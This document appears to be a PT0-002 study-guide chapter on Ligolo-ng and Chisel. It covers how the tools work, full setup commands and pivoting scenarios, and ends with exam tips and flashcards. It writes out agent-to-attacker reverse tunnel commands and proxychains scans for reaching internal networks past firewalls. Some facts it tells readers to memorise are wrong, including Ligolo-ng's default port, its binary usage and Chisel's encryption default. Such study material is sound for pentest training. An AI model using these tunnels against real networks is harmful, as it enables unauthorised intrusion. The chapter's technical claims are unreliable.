This chapter covers two essential tunneling tools for penetration testing: Ligolo-ng and Chisel. Both tools are used to establish encrypted tunnels through restrictive firewalls, allowing testers to access internal networks from a remote position. The PT0-002 exam tests your ability to select and configure the appropriate tunneling tool for a given scenario, with a focus on practical application. Questions may ask you to identify the correct tool based on features, choose the proper command syntax, or troubleshoot common issues. Expect 5-10% of exam questions to touch on tunneling concepts, including these tools.
Jump to a section
Imagine you are a spy in a heavily guarded building. The building's security (firewall) blocks all direct external connections. However, you have a contact inside the building who can make outbound calls (egress traffic) to your command center. You need to establish a reliable communication channel to exfiltrate data and send commands. This is where tunneling tools like Ligolo-ng and Chisel come in. Think of Ligolo-ng as building a dedicated underground subway tunnel between your command center and the interior of the building. Once the tunnel is built, you can freely move personnel (traffic) back and forth without going through security checkpoints. Chisel, on the other hand, is like a single, encrypted pipe that you can use to send specific messages or files (ports) through, but it requires a bit more setup to route multiple types of traffic. In both cases, the key is that the initial connection is made from inside the building (outbound) to bypass the firewall's inbound restrictions. Once established, the tunnel allows bidirectional communication, effectively making the internal network accessible from the outside as if you were inside. Just as a subway tunnel can carry multiple trains (protocols) and passengers (data), these tools can tunnel multiple types of traffic over a single connection. The difference is that Ligolo-ng creates a full network interface tunnel, while Chisel creates a SOCKS proxy or port forwarding tunnel.
What are Ligolo-ng and Chisel?
Ligolo-ng and Chisel are open-source tunneling tools used in penetration testing to create encrypted communication channels through firewalls. They enable an attacker to access internal network resources from a remote machine by establishing a tunnel that bypasses network perimeter controls. Both tools rely on a client-server architecture where the client (agent) runs on the target internal machine and initiates an outbound connection to the server (proxy) running on the attacker's machine. This outbound connection is typically allowed by firewalls, which block inbound connections but permit outbound traffic. Once the tunnel is established, the attacker can route traffic through it to reach internal hosts.
Ligolo-ng: Network-Level Tunneling
Ligolo-ng is a tunneling tool that creates a virtual network interface on the attacker's machine. It uses TUN/TAP interfaces to forward traffic at the IP level. The tool is written in Go and is designed to be lightweight and cross-platform. Ligolo-ng supports TCP and UDP tunneling and can handle multiple connections simultaneously.
How Ligolo-ng Works:
The attacker sets up a Ligolo-ng server (proxy) on their machine. The server listens on a configurable port (default 5555) for incoming connections from agents.
The agent (client) is deployed on the target internal machine. The agent connects back to the attacker's server over TCP, establishing an encrypted TLS tunnel.
Once the tunnel is established, the attacker creates a virtual network interface (e.g., tun0) on their machine. This interface is assigned an IP address from a private range (e.g., 10.10.0.1/24).
The attacker adds routes on their machine to send traffic destined for the internal network through the virtual interface. For example, ip route add 192.168.1.0/24 dev tun0.
When the attacker sends a packet to an internal IP (e.g., 192.168.1.10:80), the packet is routed through the virtual interface, encapsulated within the TLS tunnel, and forwarded to the agent. The agent decapsulates the packet and sends it to the actual internal host.
The agent also handles responses: it captures return traffic, encapsulates it, and sends it back through the tunnel to the attacker's machine.
Key Components and Defaults:
Ligolo-ng Server (proxy): Command: ligolo-ng proxy -l 0.0.0.0:5555. Default listening port: 5555. The server can also listen on other ports using -l flag.
Ligolo-ng Agent (client): Command: ligolo-ng agent -connect <server_ip>:5555 -ignore-cert. The -ignore-cert flag skips TLS certificate validation (useful for self-signed certs).
Virtual Interface: After connecting, the server creates a TUN interface (e.g., tun0). The attacker must configure routing to direct traffic through it.
Routing: On Linux, use ip route add <target_network> dev tun0. On Windows, use route add <target_network> mask <subnet> <gateway_ip> where gateway IP is the virtual interface IP.
TLS: The tunnel uses TLS for encryption. Certificates can be self-signed or custom.
Traffic Flow Example:
Attacker Machine (10.10.0.1) -> Ligolo-ng Proxy (port 5555) <--- TLS ---> Agent (192.168.1.100) -> Internal Host (192.168.1.10:80)When the attacker runs curl http://192.168.1.10:80, the operating system routes the packet to the tun0 interface. The proxy encapsulates the packet and sends it over the TLS connection to the agent. The agent decapsulates and forwards it to 192.168.1.10:80. The response follows the reverse path.
Ligolo-ng Features:
Supports both TCP and UDP.
Can tunnel multiple concurrent connections.
Supports SOCKS proxy mode (using -socks flag on proxy).
Can relay traffic through multiple agents (pivoting).
Provides a built-in listener for reverse port forwarding.
Chisel: Application-Level Tunneling
Chisel is a fast TCP/UDP tunnel over HTTP. It uses the WebSocket protocol to create an encrypted tunnel. Chisel is also written in Go and is designed for scenarios where only HTTP traffic is allowed through the firewall. It can tunnel any TCP or UDP traffic, but it operates at the application layer, making it more flexible for proxy scenarios.
How Chisel Works:
The attacker starts a Chisel server on their machine. By default, the server listens on port 8080 for HTTP connections.
The client (agent) on the target machine connects to the server over HTTP. The connection is upgraded to a WebSocket, creating a persistent tunnel.
The client can be configured to create a SOCKS proxy on the server side, allowing the attacker to use any SOCKS-capable tool (like proxychains) to route traffic through the tunnel.
Alternatively, the client can create local port forwards (reverse port forwarding) to expose internal services to the attacker's machine.
Key Components and Defaults:
Chisel Server: Command: chisel server --port 8080 --reverse. The --reverse flag enables reverse port forwarding and SOCKS proxy modes. Default port: 8080.
Chisel Client: Command: chisel client <server_ip>:8080 R:socks. The R:socks directive creates a SOCKS5 proxy on the server side, listening on port 1080 by default. Other directives: R:<local_port>:<remote_host>:<remote_port> for reverse port forwarding.
SOCKS Proxy: Default SOCKS port is 1080. The proxy is only accessible from the server machine (localhost).
Encryption: Chisel uses TLS for encryption. The server generates a self-signed certificate by default.
WebSocket: The tunnel is established over HTTP upgrade to WebSocket, which can bypass firewalls that inspect HTTP traffic.
Traffic Flow Example:
Attacker runs: chisel server --port 8080 --reverse
Agent runs: chisel client 10.0.0.1:8080 R:socks
Attacker now has a SOCKS5 proxy at 127.0.0.1:1080.
Attacker uses proxychains: proxychains nmap -sT 192.168.1.0/24
Proxychains sends each connection through the SOCKS proxy, which forwards it via the WebSocket tunnel to the agent. The agent then makes the actual connection to the internal target.
Chisel Features:
Supports TCP and UDP tunneling.
Can create multiple reverse port forwards.
Supports SOCKS5 proxy.
Can run in client-only mode (no server) for local port forwarding.
Supports authentication with a shared secret.
Comparing Ligolo-ng and Chisel
Both tools create encrypted tunnels, but they differ in their approach and use cases:
Network Layer vs Application Layer: Ligolo-ng operates at the network layer (IP), creating a virtual interface. Chisel operates at the application layer (HTTP/WebSocket).
Routing vs Proxy: Ligolo-ng requires routing configuration on the attacker's machine to send traffic through the virtual interface. Chisel provides a SOCKS proxy, which is easier to use with tools that support SOCKS (like nmap, curl, browsers).
Performance: Ligolo-ng is generally faster for bulk traffic because it avoids the overhead of SOCKS proxy. Chisel's SOCKS proxy adds some latency.
Firewall Evasion: Chisel's HTTP/WebSocket tunnel can bypass firewalls that allow HTTP but block other protocols. Ligolo-ng's TLS tunnel over TCP may be more conspicuous.
Setup Complexity: Ligolo-ng requires network routing configuration, which can be error-prone. Chisel requires only a SOCKS proxy directive.
When to Use Each Tool
Use Ligolo-ng when: You need to tunnel many different types of traffic (including UDP) and want to use the attacker's machine as if it were directly connected to the internal network. Ideal for full network access.
Use Chisel when: You need a quick, easy-to-setup proxy for specific tools, or when only HTTP traffic is allowed outbound. Chisel is also useful for reverse port forwarding to expose a single service.
Common Commands and Syntax
Ligolo-ng Setup:
On attacker:
ligolo-ng proxy -l 0.0.0.0:5555On target:
ligolo-ng agent -connect 10.0.0.1:5555 -ignore-certOn attacker (after connection):
# Create TUN interface and add route
sudo ip tuntap add dev tun0 mode tun
sudo ip link set dev tun0 up
sudo ip addr add 10.10.0.1/24 dev tun0
sudo ip route add 192.168.1.0/24 dev tun0Chisel Setup:
On attacker:
chisel server --port 8080 --reverseOn target:
chisel client 10.0.0.1:8080 R:socksOn attacker (use proxy):
proxychains nmap -sT -Pn 192.168.1.10Verification and Troubleshooting
Ligolo-ng: Check the proxy log for connection status. Use ifconfig tun0 to verify the interface is up. Use ping 192.168.1.10 to test reachability.
Chisel: Check server logs for client connections. Use curl -x socks5://127.0.0.1:1080 http://192.168.1.10:80 to test.
Security Considerations
Both tools use TLS encryption by default, but the certificates are self-signed. Use -ignore-cert or --insecure flags at your own risk.
In a legitimate penetration test, you should use proper certificates to avoid detection.
The tools can be detected by network monitoring if the TLS handshake or WebSocket upgrade is inspected.
Interaction with Related Technologies
Proxychains: Commonly used with Chisel to route traffic through the SOCKS proxy.
Nmap: Can be used with Ligolo-ng (direct routing) or Chisel (through proxychains).
Metasploit: Can use Ligolo-ng for routing traffic through compromised hosts.
Firewalls: Both tools are designed to bypass firewalls that block inbound connections but allow outbound.
Set up Ligolo-ng Server
On the attacker machine, start the Ligolo-ng proxy server. The default listening port is 5555. Use the command `ligolo-ng proxy -l 0.0.0.0:5555`. The server will wait for incoming agent connections. It is important to specify the listening IP (0.0.0.0 to listen on all interfaces) and port. The server generates a self-signed TLS certificate for encryption. You can also specify a custom certificate with `-cert` and `-key` flags. Once started, the server displays its status and waits for agents.
Deploy Ligolo-ng Agent on Target
On the target machine (internal), run the Ligolo-ng agent. The agent must be able to make an outbound TCP connection to the attacker's server. Use the command `ligolo-ng agent -connect <attacker_ip>:5555 -ignore-cert`. The `-ignore-cert` flag skips TLS certificate validation, which is necessary if the server uses a self-signed certificate. The agent will connect back to the server and establish an encrypted tunnel. The agent can also be configured to use a specific agent name with `-name` flag for identification.
Configure Virtual Interface and Routing
On the attacker machine, after the agent connects, the server creates a TUN interface (e.g., tun0). The attacker must assign an IP address to this interface and add routes to direct traffic to the internal network through it. Typically, the attacker assigns an IP from a private range (e.g., 10.10.0.1/24) to the interface and adds a route for the target internal network (e.g., 192.168.1.0/24) via the interface. Use commands: `sudo ip addr add 10.10.0.1/24 dev tun0`, `sudo ip link set tun0 up`, and `sudo ip route add 192.168.1.0/24 dev tun0`. This step is critical; without proper routing, traffic will not flow through the tunnel.
Test Connectivity Through Tunnel
Verify the tunnel is working by pinging an internal host (e.g., ping 192.168.1.10). If the ping succeeds, the tunnel is functional. If not, check the routing table, TUN interface status, and firewall rules on both sides. Also ensure the agent is running and the server logs show the connection. Use `tcpdump -i tun0` to see if packets are being forwarded. Common issues include incorrect route (e.g., missing network mask) or the target host not responding (e.g., firewall blocking ICMP).
Set up Chisel Server and Client
On the attacker, start Chisel server with `chisel server --port 8080 --reverse`. This enables reverse port forwarding and SOCKS proxy. On the target, run `chisel client <attacker_ip>:8080 R:socks`. This creates a SOCKS5 proxy on the attacker's side listening on 127.0.0.1:1080. The client connects to the server over HTTP, upgrades to WebSocket, and the tunnel is established. The attacker can then use any SOCKS-capable tool (e.g., proxychains) to route traffic through the tunnel. For reverse port forwarding, use `R:<local_port>:<target_host>:<target_port>` (e.g., `R:80:192.168.1.10:80` to expose internal web server on attacker's port 80).
In enterprise penetration tests, Ligolo-ng and Chisel are commonly used to pivot from a compromised host in a DMZ to an internal network. For example, a tester gains access to a web server in the DMZ (e.g., 10.0.0.5) that has outbound internet access. The internal network (192.168.1.0/24) is not directly reachable from the tester's machine. The tester deploys Ligolo-ng agent on the web server, which connects back to the tester's cloud-based server. Once the tunnel is up, the tester adds a route and can directly access internal hosts, such as a database server (192.168.1.10:3306), as if they were on the same network. This allows the tester to run nmap scans, exploit vulnerabilities, or exfiltrate data.
Another scenario involves a restrictive environment where only HTTP/HTTPS traffic is allowed outbound. Chisel is ideal here because it tunnels over HTTP/WebSocket. A tester might use Chisel to create a SOCKS proxy from a compromised Windows workstation. The tester can then use proxychains with tools like Metasploit or Burp Suite to attack internal applications. For example, the tester can run proxychains msfconsole and use modules that require network access to internal targets.
A common misconfiguration is forgetting to add the route in Ligolo-ng. Testers often assume the tunnel is working but cannot reach internal hosts because the operating system does not know to send traffic through the TUN interface. Another issue is using the wrong network mask in the route command. For Chisel, a frequent mistake is not using the --reverse flag on the server, which disables reverse tunneling capabilities. Also, if the target firewall blocks HTTP upgrade (WebSocket), Chisel may fail; in such cases, using a different port or TLS may help. Performance-wise, Ligolo-ng handles high-volume traffic better than Chisel, which can become slow under heavy load due to SOCKS overhead. For large file transfers, Ligolo-ng is preferred.
The PT0-002 exam (Objective 5.1) tests your ability to select and configure tunneling tools. The exam expects you to know the differences between Ligolo-ng and Chisel, their default ports, and common command syntax. Specifically, you should memorize:
Ligolo-ng default port: 5555
Chisel default port: 8080
Chisel SOCKS default port: 1080
Ligolo-ng uses TUN/TAP interfaces; Chisel uses HTTP/WebSocket.
Ligolo-ng requires routing configuration; Chisel provides a SOCKS proxy.
Common wrong answers on exam questions: 1. Confusing the default ports (e.g., thinking Chisel uses 5555). 2. Thinking Ligolo-ng uses SOCKS proxy by default (it does not; it uses a virtual interface). 3. Believing Chisel requires a TUN interface (it does not; it works at application layer). 4. Assuming both tools work only over TCP (both support UDP, but Ligolo-ng has better UDP support).
Exam questions often present a scenario and ask which tool to use. Key decision points:
If the scenario mentions 'direct network access' or 'full network layer', choose Ligolo-ng.
If the scenario mentions 'HTTP only' or 'SOCKS proxy', choose Chisel.
If the scenario mentions 'reverse port forwarding', both can do it, but Chisel is simpler.
The exam may also ask about command syntax: e.g., 'Which flag enables reverse tunneling in Chisel?' Answer: --reverse. Or 'Which flag ignores certificate validation in Ligolo-ng?' Answer: -ignore-cert.
Edge cases: The exam might test that Ligolo-ng can also act as a SOCKS proxy with -socks flag, or that Chisel can be used without --reverse for local forwarding. Also, remember that both tools support TLS encryption by default.
To eliminate wrong answers, focus on the mechanism: Ligolo-ng creates a virtual network interface; Chisel creates a proxy. Any answer that confuses these layers is likely wrong.
Ligolo-ng default port: 5555; Chisel server default port: 8080; Chisel SOCKS default port: 1080.
Ligolo-ng creates a TUN interface; Chisel creates a SOCKS proxy.
Ligolo-ng requires adding routes (e.g., `ip route add`); Chisel requires proxychains or SOCKS-aware tools.
Both tools support TLS encryption by default.
Use Ligolo-ng for full network access; use Chisel when only HTTP is allowed or for quick proxy setup.
Ligolo-ng agent connects with `-connect` flag; Chisel client uses `R:socks` for SOCKS proxy.
Chisel's `--reverse` flag is required for reverse tunneling and SOCKS proxy.
Ligolo-ng can also act as a SOCKS proxy with `-socks` flag.
Both tools are written in Go and are cross-platform.
Common exam trap: confusing default ports or thinking Chisel uses TUN/TAP.
These come up on the exam all the time. Here's how to tell them apart.
Ligolo-ng
Network-level tunnel (IP layer) using TUN/TAP interface
Default port: 5555
Requires routing configuration on attacker machine
Supports both TCP and UDP natively
Better performance for bulk traffic
Chisel
Application-level tunnel (HTTP/WebSocket) with SOCKS proxy
Default server port: 8080; SOCKS port: 1080
No routing needed; uses SOCKS proxy via proxychains
Supports TCP and UDP, but UDP requires special handling
Slightly higher latency due to SOCKS overhead
Mistake
Ligolo-ng and Chisel are interchangeable and work the same way.
Correct
They differ fundamentally: Ligolo-ng creates a network-level tunnel using a virtual interface, while Chisel creates an application-level tunnel using HTTP/WebSocket and SOCKS proxy. The choice depends on the scenario.
Mistake
Both tools require a TUN/TAP interface on the client side.
Correct
Only Ligolo-ng creates a TUN interface on the server (attacker) side. Chisel does not use TUN/TAP; it tunnels traffic through WebSocket and provides a SOCKS proxy.
Mistake
Chisel's default port is 1080.
Correct
Chisel's server default port is 8080. The SOCKS proxy created by Chisel listens on port 1080 by default, but the tunnel itself uses port 8080.
Mistake
Ligolo-ng cannot tunnel UDP traffic.
Correct
Ligolo-ng supports both TCP and UDP tunneling. It can handle DNS queries and other UDP-based protocols.
Mistake
Chisel only works over HTTP and cannot use TLS.
Correct
Chisel uses TLS by default for encryption. The WebSocket connection is upgraded from HTTP, but the underlying transport is encrypted with TLS.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
Ligolo-ng creates a network-level tunnel using a virtual TUN interface, allowing direct routing to internal networks. Chisel creates an application-level tunnel over HTTP/WebSocket, typically providing a SOCKS proxy. Ligolo-ng requires routing configuration; Chisel requires a SOCKS-capable tool like proxychains. Choose Ligolo-ng for full network access, Chisel for quick proxy setup or when only HTTP is allowed.
Ligolo-ng server listens on port 5555 by default. Chisel server listens on port 8080 by default. When Chisel creates a SOCKS proxy, it listens on port 1080 by default. These are common exam facts.
On the attacker, run `ligolo-ng proxy -l 0.0.0.0:5555`. On the target, run `ligolo-ng agent -connect <attacker_ip>:5555 -ignore-cert`. Then on the attacker, create a TUN interface (e.g., `sudo ip tuntap add dev tun0 mode tun`), assign an IP (`sudo ip addr add 10.10.0.1/24 dev tun0`), and add a route (`sudo ip route add <target_network> dev tun0`).
On the attacker, run `chisel server --port 8080 --reverse`. On the target, run `chisel client <attacker_ip>:8080 R:socks`. The attacker then has a SOCKS5 proxy at 127.0.0.1:1080. Use with proxychains: `proxychains <tool>`.
Yes, Ligolo-ng supports both TCP and UDP tunneling. It can handle protocols like DNS. Chisel also supports UDP but requires explicit configuration (e.g., using `R:udp` directives).
The `-ignore-cert` flag on the Ligolo-ng agent skips TLS certificate validation. This is necessary when the server uses a self-signed certificate. Without it, the agent may reject the connection if the certificate is not trusted.
The `--reverse` flag on the Chisel server enables reverse tunneling capabilities, including reverse port forwarding and SOCKS proxy. Without this flag, the client cannot create reverse tunnels.
You've just covered Ligolo-ng and Chisel for Tunneling — now see how well it sticks with free PT0-002 practice questions. Full explanations included, no account needed.
Done with this chapter?